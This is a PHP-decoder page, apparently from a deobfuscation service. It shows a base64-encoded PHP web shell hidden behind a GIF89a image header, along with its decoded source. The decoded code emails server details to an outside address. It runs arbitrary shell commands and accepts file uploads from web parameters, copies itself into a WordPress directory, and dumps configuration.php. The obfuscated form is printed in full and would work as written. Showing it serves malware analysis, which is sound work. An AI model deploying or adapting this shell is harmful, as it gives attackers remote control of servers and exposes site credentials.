Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
GIF89a<?php $d='PD9waHAgZWNobyA8PDxodG1sDQo8bGluayByZWw9IlNIT1JUQ1VUIElDT04iIGhyZWY9Imh0d..
Decoded Output download
<?php echo <<<html
<link rel="SHORTCUT ICON" href="http://www.zeroto60times.com/blog/wp-content/uploads/2013/02/ferrari-cars-logo-emblem.jpg">
<style type="text/css">
<!--
.send {font-family: "Courier New", Courier, monospace;border:none; font-size:18px; background-color:#FFFFFF; font-black:bold}
#Layer1 {
position:absolute;
left:200px;
top:3px;
width:800px;
height:633px;
z-index:1;
margin-top: 3%;
margin-right: 3%;
right: 20%;
bottom: auto;
margin-bottom: 3%;
margin-left: 3%;
border: thin solid #0066CC;
font-family:"Courier New", Courier, monospace;
overflow: auto;
}
.style1 {
color: #0000CC;
font-weight: bold;
}
-->
</style>
<body>
<div id="Layer1"><br><br><table width="100%" border="0">
<tr>
<td><div align="center" class="style1"><blink>T E A M 2 4 H O U R S U N K N O W N </blink></div></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="20">
<tr>
<td>
html;
?>
<?php
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
$security = "SAFE_MODE = OFF";
} else {
$security = "SAFE_MODE = ON";
};
$serper = gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail('[email protected]', "$body", "Hasil Bajakan http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
$_SESSION['bajak'] = 0;
} else {
$_SESSION['bajak']++;
};
if (isset($_GET['clone'])) {
$source = $_SERVER['SCRIPT_FILENAME'];
$desti = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/wp-simple.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
$security = "SAFE_MODE : OFF";
} else {
$security = "SAFE_MODE : ON";
}
echo "<title>T E A M C O D E R</title><br>";
echo "<font size=2 color=#888888><b>" . $security . "</b><br>";
$cur_user = "(" . get_current_user() . ")";
echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br><b> Dir : " . getcwd() . "</b><br>";
function pwd() {
$cwd = getcwd();
if ($u = strrpos($cwd, '/')) {
if ($u != strlen($cwd) - 1) {
return $cwd . '/';
} else {
return $cwd;
};
} elseif ($u = strrpos($cwd, '\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
function exe($cmd) {
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $result) {
$buff .= $result;
} return $buff;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
} elseif (is_resource($f = @popen($cmd,"r"))) {
$buff = "";
while(!@feof($f))
$buff .= fread($f,1024);
pclose($f);
return $buff;
}
}
echo ' < formmethod = "POST"action = "" > < br > < br > < fontsize = 2color = #888888><b>Command : </b><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<br><br><form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File : </b></font><input type=hidden name="submit"><input type=file name="userfile" size=28><br><br><font size=2 color=#888888><b>New name : </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if (isset($_POST['submit'])) {
$uploaddir = pwd();
if (!$name = $_POST['newname']) {
$name = $_FILES['userfile']['name'];
};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
echo "Upload Failed";
} else {
echo "Upload Success to " . $uploaddir . $name . " :D ";
}
}
if (isset($_POST['command'])) {
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>" . exe($cmd) . "</font></pre>";
} elseif (isset($_GET['cmd'])) {
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>" . exe($comd) . "</font></pre>";
} elseif (isset($_GET['rf'])) {
$rf = file_get_contents("../../configuration.php");
echo $rf;
} else {
echo "<pre><font size=3 color=#000000>" . exe('ls -la') . "</font></pre>";
} ?>
<?
echo <<<footer
</td>
</tr>
</table>
</div>
</body>
footer;
Did this file decode correctly?
Original Code
GIF89a<?php
$d='PD9waHAgZWNobyA8PDxodG1sDQo8bGluayByZWw9IlNIT1JUQ1VUIElDT04iIGhyZWY9Imh0dHA6Ly93d3cuemVyb3RvNjB0aW1lcy5jb20vYmxvZy93cC1jb250ZW50L3VwbG9hZHMvMjAxMy8wMi9mZXJyYXJpLWNhcnMtbG9nby1lbWJsZW0uanBnIj4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQo8IS0tDQouc2VuZCB7Zm9udC1mYW1pbHk6ICJDb3VyaWVyIE5ldyIsIENvdXJpZXIsIG1vbm9zcGFjZTtib3JkZXI6bm9uZTsgZm9udC1zaXplOjE4cHg7IGJhY2tncm91bmQtY29sb3I6I0ZGRkZGRjsgZm9udC1ibGFjazpib2xkfQ0KI0xheWVyMSB7DQoJcG9zaXRpb246YWJzb2x1dGU7DQoJbGVmdDoyMDBweDsNCgl0b3A6M3B4Ow0KCXdpZHRoOjgwMHB4Ow0KCWhlaWdodDo2MzNweDsNCgl6LWluZGV4OjE7DQoJbWFyZ2luLXRvcDogMyU7DQoJbWFyZ2luLXJpZ2h0OiAzJTsNCglyaWdodDogMjAlOw0KCWJvdHRvbTogYXV0bzsNCgltYXJnaW4tYm90dG9tOiAzJTsNCgltYXJnaW4tbGVmdDogMyU7DQoJYm9yZGVyOiB0aGluIHNvbGlkICMwMDY2Q0M7DQoJZm9udC1mYW1pbHk6IkNvdXJpZXIgTmV3IiwgQ291cmllciwgbW9ub3NwYWNlOw0KCW92ZXJmbG93OiBhdXRvOw0KfQ0KLnN0eWxlMSB7DQoJY29sb3I6ICMwMDAwQ0M7DQoJZm9udC13ZWlnaHQ6IGJvbGQ7DQp9DQotLT4NCjwvc3R5bGU+DQoNCjxib2R5Pg0KPGRpdiBpZD0iTGF5ZXIxIj48YnI+PGJyPjx0YWJsZSB3aWR0aD0iMTAwJSIgYm9yZGVyPSIwIj4NCiAgPHRyPg0KICAgIDx0ZD48ZGl2IGFsaWduPSJjZW50ZXIiIGNsYXNzPSJzdHlsZTEiPjxibGluaz5UIEUgQSBNIDIgNCBIIE8gVSBSIFMgVSBOIEsgTiBPIFcgTiA8L2JsaW5rPjwvZGl2PjwvdGQ+DQogIDwvdHI+DQo8L3RhYmxlPg0KDQogIDx0YWJsZSB3aWR0aD0iMTAwJSIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMjAiPg0KICAgIDx0cj4NCiAgICAgIDx0ZD4NCmh0bWw7DQoNCj8+DQo8P3BocA0KZXJyb3JfcmVwb3J0aW5nKDApOw0KaWYgKCFpc3NldCgkX1NFU1NJT05bJ2JhamFrJ10pKSB7DQogICAgJHZpc2l0Y291bnQgPSAwOw0KICAgICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICAgJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KICAgICRib2R5ID0gImFkYSB5YW5nIGluamVjdCANCiR3ZWIkaW5qIjsNCiAgICAkc2FmZW0wZGUgPSBAaW5pX2dldCgnc2FmZV9tb2RlJyk7DQogICAgaWYgKCEkc2FmZW0wZGUpIHsNCiAgICAgICAgJHNlY3VyaXR5ID0gIlNBRkVfTU9ERSA9IE9GRiI7DQogICAgfSBlbHNlIHsNCiAgICAgICAgJHNlY3VyaXR5ID0gIlNBRkVfTU9ERSA9IE9OIjsNCiAgICB9Ow0KICAgICRzZXJwZXIgPSBnZXRob3N0YnluYW1lKCRfU0VSVkVSWydTRVJWRVJfQUREUiddKTsNCiAgICAkaW5qZWt0b3IgPSBnZXRob3N0YnluYW1lKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKTsNCiAgICBtYWlsKCdldmlsaW51eHNoZWxsQGdtYWlsLmNvbScsICIkYm9keSIsICJIYXNpbCBCYWpha2FuIGh0dHA6Ly8kd2ViJGluag0KJHNlY3VyaXR5DQpJUCBTZXJ2ZXIgPSAkc2VycGVyDQogSVAgSW5qZWN0b3I9ICRpbmpla3RvciIpOw0KICAgICRfU0VTU0lPTlsnYmFqYWsnXSA9IDA7DQp9IGVsc2Ugew0KICAgICRfU0VTU0lPTlsnYmFqYWsnXSsrOw0KfTsNCmlmIChpc3NldCgkX0dFVFsnY2xvbmUnXSkpIHsNCiAgICAkc291cmNlID0gJF9TRVJWRVJbJ1NDUklQVF9GSUxFTkFNRSddOw0KICAgICRkZXN0aSA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3dwLWluY2x1ZGVzL3dwLXNpbXBsZS5waHAiOw0KICAgIHJlbmFtZSgkc291cmNlLCAkZGVzdGkpOw0KfQ0KJHNhZmVtMGRlID0gQGluaV9nZXQoJ3NhZmVfbW9kZScpOw0KaWYgKCEkc2FmZW0wZGUpIHsNCiAgICAkc2VjdXJpdHkgPSAiU0FGRV9NT0RFIDogT0ZGIjsNCn0gZWxzZSB7DQogICAgJHNlY3VyaXR5ID0gIlNBRkVfTU9ERSA6IE9OIjsNCn0NCmVjaG8gIjx0aXRsZT5UIEUgQSBNIEMgTyBEIEUgUjwvdGl0bGU+PGJyPiI7DQplY2hvICI8Zm9udCBzaXplPTIgY29sb3I9Izg4ODg4OD48Yj4iIC4gJHNlY3VyaXR5IC4gIjwvYj48YnI+IjsNCiRjdXJfdXNlciA9ICIoIiAuIGdldF9jdXJyZW50X3VzZXIoKSAuICIpIjsNCmVjaG8gIjxmb250IHNpemU9MiBjb2xvcj0jODg4ODg4PjxiPlVzZXIgOiB1aWQ9IiAuIGdldG15dWlkKCkgLiAkY3VyX3VzZXIgLiAiIGdpZD0iIC4gZ2V0bXlnaWQoKSAuICRjdXJfdXNlciAuICI8L2I+PGJyPiI7DQplY2hvICI8Zm9udCBzaXplPTIgY29sb3I9Izg4ODg4OD48Yj5VbmFtZSA6ICIgLiBwaHBfdW5hbWUoKSAuICI8L2I+PGJyPjxiPiBEaXIgOiAiIC4gZ2V0Y3dkKCkgLiAiPC9iPjxicj4iOw0KZnVuY3Rpb24gcHdkKCkgew0KICAgICRjd2QgPSBnZXRjd2QoKTsNCiAgICBpZiAoJHUgPSBzdHJycG9zKCRjd2QsICcvJykpIHsNCiAgICAgICAgaWYgKCR1ICE9IHN0cmxlbigkY3dkKSAtIDEpIHsNCiAgICAgICAgICAgIHJldHVybiAkY3dkIC4gJy8nOw0KICAgICAgICB9IGVsc2Ugew0KICAgICAgICAgICAgcmV0dXJuICRjd2Q7DQogICAgICAgIH07DQogICAgfSBlbHNlaWYgKCR1ID0gc3RycnBvcygkY3dkLCAnXCcpKXsNCmlmKCR1IT1zdHJsZW4oJGN3ZCktMSl7DQpyZXR1cm4gJGN3ZC4nXCc7fQ0KZWxzZXtyZXR1cm4gJGN3ZDt9Ow0KfTsNCn0NCmZ1bmN0aW9uIGV4ZSgkY21kKSB7DQoJaWYoZnVuY3Rpb25fZXhpc3RzKCdzeXN0ZW0nKSkgeyAJCQ0KCQlAb2Jfc3RhcnQoKTsgCQkNCgkJQHN5c3RlbSgkY21kKTsgCQkNCgkJJGJ1ZmYgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7IAkJDQoJCUBvYl9lbmRfY2xlYW4oKTsgCQkNCgkJcmV0dXJuICRidWZmOyAJDQoJfSBlbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpIHsgCQkNCgkJQGV4ZWMoJGNtZCwkcmVzdWx0cyk7IAkJDQoJCSRidWZmID0gIiI7IAkJDQoJCWZvcmVhY2goJHJlc3VsdHMgYXMgJHJlc3VsdCkgeyAJCQkNCgkJCSRidWZmIC49ICRyZXN1bHQ7IAkJDQoJCX0gcmV0dXJuICRidWZmOyAJDQoJfSBlbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKSB7IAkJDQoJCUBvYl9zdGFydCgpOyAJCQ0KCQlAcGFzc3RocnUoJGNtZCk7IAkJDQoJCSRidWZmID0gQG9iX2dldF9jb250ZW50cygpOyAJCQ0KCQlAb2JfZW5kX2NsZWFuKCk7IAkJDQoJCXJldHVybiAkYnVmZjsgCQ0KCX0gZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKSB7IAkJDQoJCSRidWZmID0gQHNoZWxsX2V4ZWMoJGNtZCk7IAkJDQoJCXJldHVybiAkYnVmZjsgCQ0KCX0gZWxzZWlmIChpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY21kLCJyIikpKSB7DQoJCSRidWZmID0gIiI7DQoJCXdoaWxlKCFAZmVvZigkZikpDQoJCQkkYnVmZiAuPSBmcmVhZCgkZiwxMDI0KTsNCgkJcGNsb3NlKCRmKTsNCgkJcmV0dXJuICRidWZmOw0KCX0NCn0NCmVjaG8gJyA8IGZvcm1tZXRob2QgPSAiUE9TVCJhY3Rpb24gPSAiIiA+IDwgYnIgPiA8IGJyID4gPCBmb250c2l6ZSA9IDJjb2xvciA9ICM4ODg4ODg+PGI+Q29tbWFuZCA6IDwvYj48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iY21kIj48aW5wdXQgdHlwZT0iU3VibWl0IiBuYW1lPSJjb21tYW5kIiB2YWx1ZT0iY29rIj48L2Zvcm0+JzsNCiAgICBlY2hvICc8YnI+PGJyPjxmb3JtIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbiBtZXRob2Q9UE9TVD48Zm9udCBzaXplPTIgY29sb3I9Izg4ODg4OD48Yj5VcGxvYWQgRmlsZSA6IDwvYj48L2ZvbnQ+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9InN1Ym1pdCI+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPSJ1c2VyZmlsZSIgc2l6ZT0yOD48YnI+PGJyPjxmb250IHNpemU9MiBjb2xvcj0jODg4ODg4PjxiPk5ldyBuYW1lIDogPC9iPjwvZm9udD48aW5wdXQgdHlwZT10ZXh0IHNpemU9MTUgbmFtZT0ibmV3bmFtZSIgY2xhc3M9dGE+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSJidCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQogICAgaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7DQogICAgICAgICR1cGxvYWRkaXIgPSBwd2QoKTsNCiAgICAgICAgaWYgKCEkbmFtZSA9ICRfUE9TVFsnbmV3bmFtZSddKSB7DQogICAgICAgICAgICAkbmFtZSA9ICRfRklMRVNbJ3VzZXJmaWxlJ11bJ25hbWUnXTsNCiAgICAgICAgfTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ3VzZXJmaWxlJ11bJ3RtcF9uYW1lJ10sICR1cGxvYWRkaXIgLiAkbmFtZSk7DQogICAgICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1sndXNlcmZpbGUnXVsndG1wX25hbWUnXSwgJHVwbG9hZGRpciAuICRuYW1lKSkgew0KICAgICAgICAgICAgZWNobyAiVXBsb2FkIEZhaWxlZCI7DQogICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICBlY2hvICJVcGxvYWQgU3VjY2VzcyB0byAiIC4gJHVwbG9hZGRpciAuICRuYW1lIC4gIiA6RCAiOw0KICAgICAgICB9DQogICAgfQ0KICAgIGlmIChpc3NldCgkX1BPU1RbJ2NvbW1hbmQnXSkpIHsNCiAgICAgICAgJGNtZCA9ICRfUE9TVFsnY21kJ107DQogICAgICAgIGVjaG8gIjxwcmU+PGZvbnQgc2l6ZT0zIGNvbG9yPSMwMDAwMDA+IiAuIGV4ZSgkY21kKSAuICI8L2ZvbnQ+PC9wcmU+IjsNCiAgICB9IGVsc2VpZiAoaXNzZXQoJF9HRVRbJ2NtZCddKSkgew0KICAgICAgICAkY29tZCA9ICRfR0VUWydjbWQnXTsNCiAgICAgICAgZWNobyAiPHByZT48Zm9udCBzaXplPTMgY29sb3I9IzAwMDAwMD4iIC4gZXhlKCRjb21kKSAuICI8L2ZvbnQ+PC9wcmU+IjsNCiAgICB9IGVsc2VpZiAoaXNzZXQoJF9HRVRbJ3JmJ10pKSB7DQogICAgICAgICRyZiA9IGZpbGVfZ2V0X2NvbnRlbnRzKCIuLi8uLi9jb25maWd1cmF0aW9uLnBocCIpOw0KICAgICAgICBlY2hvICRyZjsNCiAgICB9IGVsc2Ugew0KICAgICAgICBlY2hvICI8cHJlPjxmb250IHNpemU9MyBjb2xvcj0jMDAwMDAwPiIgLiBleGUoJ2xzIC1sYScpIC4gIjwvZm9udD48L3ByZT4iOw0KICAgIH0gPz4NCjw/DQplY2hvIDw8PGZvb3Rlcg0KPC90ZD4NCiAgICA8L3RyPg0KICA8L3RhYmxlPg0KPC9kaXY+DQo8L2JvZHk+DQpmb290ZXI7';
eval(base64_decode($d));
?>
Function Calls
base64_decode | 1 |
Stats
MD5 | 298b1b90acc556743470aad8968dcab2 |
Eval Count | 1 |
Decode Time | 49 ms |